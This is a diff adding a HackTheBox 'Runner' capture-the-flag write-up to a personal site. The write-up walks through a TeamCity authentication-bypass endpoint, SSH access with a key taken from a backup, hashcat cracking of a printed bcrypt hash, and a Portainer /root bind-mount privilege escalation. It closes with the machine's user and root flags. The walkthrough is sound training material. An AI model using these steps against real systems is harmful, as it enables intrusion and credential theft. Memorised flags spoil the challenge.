runner writeup

index.md

@@ -4,6 +4,29 @@ layout: default
 
 <h1>News</h1>
 
+<hr>
+<article>
+  <div style="display: flex;">
+      <div style="flex: 1">
+        <center>
+          <img width="400em" src="data:image/png;base64,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" alt="">
+        </center>
+      </div>
+      <div style="flex: 1">
+        <h2>HackTheBox - Runner - Writeup</h2>
+        <p>Season 5 is started on HackTheBox. A new writeup for HackTheBox - Runner is now Available.</p>
+
+        <center>
+          <a href="{{'/pages/writeups/hackthebox/machiens/runner/runner'}}" class="btn">Check it Out</a>
+        </center>
+
+        <br>
+        <small>25 Apr 2024</small>
+      </div>
+  </div>
+</article>
+
+
 <hr>
 <article>
   <div style="display: flex;">

pages/writeups.md

@@ -13,6 +13,14 @@ layout: default
         <th scope="col">Writeup</th>
     </thead>
     <tbody>
+        <tr>
+            <td><a href="https://www.hackthebox.com/">HackTheBox</a></td>
+            <td>Machine</td>
+            <td>Runner</td>
+            <td class="d-flex justify-content-center">
+                <a href="{{'/pages/writeups/hackthebox/machines/runner/runner'}}" class="btn">Read</a>
+            </td>
+        </tr>
         <tr>
             <td><a href="https://www.hackthebox.com/">HackTheBox</a></td>
             <td>Web</td>

pages/writeups/hackthebox/machines/runner/runner.md

@@ -0,0 +1,148 @@
+---
+layout: post
+author: k0d14k
+title: Runner (machine)
+---
+
+<img src="runner.png" alt="logo" style="width:100px;"/>
+
+
+Tags: `TeamCity`, `SSH Private Key`, `Portainer Privilege Escalation`
+
+---
+
+## Introduction and information gathering
+
+In this machine provided by HackThebBox We have a CI/CD provider’s web site.
+
+![Untitled](Untitled.png)
+
+Looking into the web site it doesn’t seem to provide any useful information So i start with a `gobuster` enumeration (I used [this](https://github.com/danielmiessler/SecLists/blob/master/Discovery/DNS/bitquark-subdomains-top100000.txt) wordlist in this pentest).
+
+```bash
+┌──(k0d14k㉿k0d14k)-[~/…/tools/SecLists/Discovery/DNS]
+└─$ gobuster vhost -u runner.htb -t 100 -w bitquark-subdomains-top100000.txt --append-domain 
+===============================================================
+Gobuster v3.6
+by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+===============================================================
+[+] Url:             http://runner.htb
+[+] Method:          GET
+[+] Threads:         100
+[+] Wordlist:        bitquark-subdomains-top100000.txt
+[+] User Agent:      gobuster/3.6
+[+] Timeout:         10s
+[+] Append Domain:   true
+===============================================================
+Starting gobuster in VHOST enumeration mode
+===============================================================
+Found: teamcity.runner.htb Status: 401 [Size: 66]
+Progress: 100000 / 100001 (100.00%)
+===============================================================
+Finished
+===============================================================
+
+```
+
+As shown by the `gobuster` execution, there is an alternative DNS known as `teamcity.runner.htb`.
+
+![Untitled](Untitled%201.png)
+
+I never heard of this service before but I used `IntelliJ Idea` in the past so I know the `JetBrains` style and this is a `JetBrains` Service.
+
+Searching for some more information I noticed that this version of `TeamCity` has at least two CVEs and so I start to try some exploits.
+
+Bot of these CVEs are explained [here](https://www.rapid7.com/blog/post/2024/03/04/etr-cve-2024-27198-and-cve-2024-27199-jetbrains-teamcity-multiple-authentication-bypass-vulnerabilities-fixed/) and I can confirm that, using this article, I was able to get an administrator’s access token to get logged in.
+
+As the guide suggests I’ve got the admin id by accessing the endpoint: `/hax?jsp=/app/rest/users;.jsp`
+
+![Untitled](Untitled%202.png)
+
+Then, by the following request, I’ve got the admin’s token:
+
+![Untitled](Untitled%203.png)
+
+And now I’m able to access the admin dashboard in `/admin/admin.html`.
+
+![Untitled](Untitled%204.png)
+
+## Getting the first access
+
+In the left menu, We have many entries. If you look better you’ll notice that there is the `Server Administration` sub-menu that seems very interesting.
+
+ In this part we have a `backup` functionality and it seems to provide very useful information:
+
+![Untitled](Untitled%205.png)
+
+After I downloaded and unzipped the backup I found an SSH key in the project's directory so We could establish a connection using one of the default users: `john` or `matthew`. So after set `400` permission over the `id_rsa` file We could launch the command:
+
+```bash
+ssh -i id_rsa john@runner.htb
+```
+
+And We are effectively connected as `john`.
+
+![Untitled](Untitled%206.png)
+
+### Road to ROOT
+
+Now our focus is: “How can We become root”? Let’s see if We covered every host by catting `/etc/hosts`:
+
+```bash
+john@runner:/tmp$ cat /etc/hosts
+127.0.0.1 localhost
+127.0.1.1 runner runner.htb teamcity.runner.htb portainer-administration.runner.htb
+
+# The following lines are desirable for IPv6 capable hosts
+::1     ip6-localhost ip6-loopback
+fe00::0 ip6-localnet
+ff00::0 ip6-mcastprefix
+ff02::1 ip6-allnodes
+ff02::2 ip6-allrouters
+
+```
+
+OK, We’ve got a new host: `portainer-administration.runner.htb`. Another useful piece of information that I didn’t tell you (but you should know if you are following this guide to solve the machine) is that in the backup there was a set of bcrypted passwords.
+
+As I told you before, Matthew is a local user on the server. Maybe this user is linked to portainer so let’s try to crack the password using `hashcat`.
+
+```bash
+┌──(k0d14k㉿k0d14k)-[~/…/projects/AllProjects/pluginData/ssh_keys]
+└─$ hashcat -m 3200 hash /usr/share/wordlists/rockyou.txt -w 3 -S --show 
+$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em:piper123
+```
+
+I used the `--show` flag because I just got this password, you should create the hash file (containing the bcrypt) and copy-paste the command without the flag).
+
+Let’s try to login into portainer with the founded credentials:
+
+![Untitled](Untitled%207.png)
+
+In portainer there is a really pretty way to gain privileges.
+
+First of all the attacker needs to create a volume with the following attributes:
+
+```bash
+type=tmpfs
+device=tmpfs
+o=bind
+device=/root
+```
+
+Then you should be able to create a new interactive container, where you are root by default, and mount this volume, when you attach a shell you get the host /root in your virtual filesystem.
+
+So let’s connect a shell to the container:
+
+![Untitled](Untitled%208.png)
+
+And then get our last flag:
+
+![Untitled](Untitled%209.png)
+
+---
+
+## Flags
+
+## User flag: f2ed51639b0070b93164b4707927dc6d
+
+## Root flag: 608da84938460b9541397de388d09997